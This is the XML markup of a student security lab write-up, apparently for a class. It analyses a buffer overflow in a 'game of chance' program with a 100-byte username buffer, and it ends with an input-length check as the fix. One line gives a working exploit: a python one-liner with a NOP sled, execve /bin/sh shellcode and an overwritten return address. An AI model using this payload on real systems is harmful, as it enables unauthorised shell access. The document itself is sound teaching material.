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FC621" w14:textId="3A2422AD" w:rsidR="00904EDD" w:rsidRDefault="00904EDD">
      <w:r>
        <w:t>Kimlong Seng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17531C92" w14:textId="11383906" w:rsidR="00904EDD" w:rsidRDefault="00904EDD">
      <w:r>
        <w:t>Project 0</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="34F063F0" w14:textId="0536AFFA" w:rsidR="00904EDD" w:rsidRDefault="00904EDD"/>
    <w:p w14:paraId="4DFD1A9E" w14:textId="6457E35B" w:rsidR="00904EDD" w:rsidRPr="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a. </w:t>
      </w:r>
      <w:r w:rsidR="00904EDD">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00904EDD" w:rsidRPr="00C3181A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability is in the game of chance is locate at the while loop, as it does not count how many </w:t>
      </w:r>
      <w:r w:rsidR="00241119" w:rsidRPr="00C3181A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>inputs</w:t>
      </w:r>
      <w:r w:rsidR="00904EDD" w:rsidRPr="00C3181A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3181A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>is taking</w:t>
      </w:r>
      <w:r w:rsidR="00904EDD" w:rsidRPr="00C3181A">
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00904EDD" w:rsidRPr="00904EDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="675E3868" wp14:editId="7253BAF5">
            <wp:extent cx="5943600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3AC7" w14:textId="1ABA1698" w:rsidR="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>b. Global variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD16876" w14:textId="63500679" w:rsidR="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73B83254" wp14:editId="7C6FAD15">
            <wp:extent cx="43434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35F0" w14:textId="3FEB7B52" w:rsidR="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>c. Username buffer is 100 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4DDCC" w14:textId="20915A63" w:rsidR="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295E55A8" wp14:editId="4C2E2013">
            <wp:extent cx="4794250" cy="1884919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579" cy="190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DF24" w14:textId="77777777" w:rsidR="00135D2A" w:rsidRDefault="00135D2A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D974BCE" w14:textId="77777777" w:rsidR="00135D2A" w:rsidRDefault="00135D2A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8CA1FB" w14:textId="77777777" w:rsidR="00135D2A" w:rsidRDefault="00135D2A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D83EF5" w14:textId="77777777" w:rsidR="00135D2A" w:rsidRDefault="00135D2A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61BB4707" w14:textId="77777777" w:rsidR="00135D2A" w:rsidRDefault="00135D2A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CFF417F" w14:textId="77777777" w:rsidR="00877F25" w:rsidRDefault="00877F25" w:rsidP="0046629B"/>
    <w:p w14:paraId="059FE500" w14:textId="77777777" w:rsidR="00877F25" w:rsidRDefault="00877F25" w:rsidP="0046629B"/>
    <w:p w14:paraId="53A161A9" w14:textId="0A5677FE" w:rsidR="0046629B" w:rsidRDefault="00877F25" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">knowing the </w:t>
      </w:r>
      <w:r w:rsidR="000647E7">
        <w:t>overflow,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000647E7">
        <w:t>we can inject the shell code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> binary </w:t>
      </w:r>
      <w:r w:rsidR="000647E7">
        <w:t xml:space="preserve">into the program by using python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5943A" w14:textId="32460053" w:rsidR="00877F25" w:rsidRDefault="00877F25" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Non operator 40 byte] [The shellcode 25 byte] [the 49 A print] [our memory location </w:t>
      </w:r>
      <w:r w:rsidRPr="00877F25">
        <w:t>0xffffc777</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42873AB5" w14:textId="5FC0EDA7" w:rsidR="000647E7" w:rsidRDefault="000647E7" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000647E7">
        <w:t>(python -c 'print "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*47 + "\x</w:t>
      </w:r>
      <w:r>
        <w:t>77</w:t>
      </w:r>
      <w:r w:rsidRPr="000647E7">
        <w:t>\x</w:t>
      </w:r>
      <w:r>
        <w:t>c7</w:t>
      </w:r>
      <w:r w:rsidRPr="000647E7">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000647E7">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000647E7">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000647E7">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000647E7">
        <w:t>"')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABED52" w14:textId="77777777" w:rsidR="00753F0F" w:rsidRDefault="001A6A87" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40A59600" wp14:editId="1926611B">
            <wp:extent cx="5943600" cy="4277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93B0" w14:textId="5299A731" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BAFF404" w14:textId="583128E6" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FAEBAC" w14:textId="653029CE" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03C0BBA6" w14:textId="13EB93CB" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9186F8" w14:textId="1CF3C917" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F762789" w14:textId="02D784BF" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210C3BED" w14:textId="6D63B0D7" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24840C5D" w14:textId="78DB00C2" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B8FC6E" w14:textId="47B8B571" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141593B5" w14:textId="1AD05090" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AF5491" w14:textId="154C179E" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2332D32E" w14:textId="6FDC49D3" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="710913BE" w14:textId="0447560A" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC7468" w14:textId="3BCA8B27" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64493B0C" w14:textId="686B1A11" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C3DDAED" w14:textId="77777777" w:rsidR="00753F0F" w:rsidRDefault="00753F0F" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20B164DD" w14:textId="019CE206" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>To fix it, I make a function to count how many characters there are from the user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BCB42D" w14:textId="5B30353F" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">And if the character is over 100 it will print out message and kick the user out of the program </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF8F316" w14:textId="77777777" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14548159" wp14:editId="62DBBE30">
            <wp:extent cx="5333269" cy="35623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114" cy="357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61D9" w14:textId="77777777" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06CA0E3A" w14:textId="0950AFB6" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Here is what happen if u try to enter more than 100 character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13974911" w14:textId="77777777" w:rsidR="006E59BD" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15530DD0" w14:textId="0EA42948" w:rsidR="00877F25" w:rsidRDefault="006E59BD" w:rsidP="006E59BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD06840" wp14:editId="52831BB4">
            <wp:extent cx="5943600" cy="3425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FC5">
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083D4BF" w14:textId="77777777" w:rsidR="001B2FC5" w:rsidRDefault="001B2FC5" w:rsidP="00877F25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310AE27B" w14:textId="21B44484" w:rsidR="00877F25" w:rsidRDefault="00877F25" w:rsidP="0046629B"/>
    <w:p w14:paraId="7DBCDC00" w14:textId="31CC0931" w:rsidR="009D2849" w:rsidRPr="00C3181A" w:rsidRDefault="009D2849" w:rsidP="009D2849">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A569F13" w14:textId="1440E9D3" w:rsidR="00C3181A" w:rsidRDefault="00C3181A" w:rsidP="00C3181A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C3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EF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60725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A5"/>
    <w:rsid w:val="000647E7"/>
    <w:rsid w:val="00135D2A"/>
    <w:rsid w:val="00174911"/>
    <w:rsid w:val="001A6A87"/>
    <w:rsid w:val="001B2FC5"/>
    <w:rsid w:val="00227FA5"/>
    <w:rsid w:val="00241119"/>
    <w:rsid w:val="0027074B"/>
    <w:rsid w:val="002925B0"/>
    <w:rsid w:val="0046629B"/>
    <w:rsid w:val="004D7A84"/>
    <w:rsid w:val="006A4D1A"/>
    <w:rsid w:val="006E59BD"/>
    <w:rsid w:val="00753F0F"/>
    <w:rsid w:val="00877F25"/>
    <w:rsid w:val="00904EDD"/>
    <w:rsid w:val="009D2849"/>
    <w:rsid w:val="009D722B"/>
    <w:rsid w:val="00C3181A"/>
    <w:rsid w:val="00DD56FF"/>
    <w:rsid w:val="00DF4F7C"/>
    <w:rsid w:val="00E2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3E74"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CEF008A-1A17-4738-8FF1-59DA6B42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Kimlong seng</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kimlong seng</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-22T21:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-29T22:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>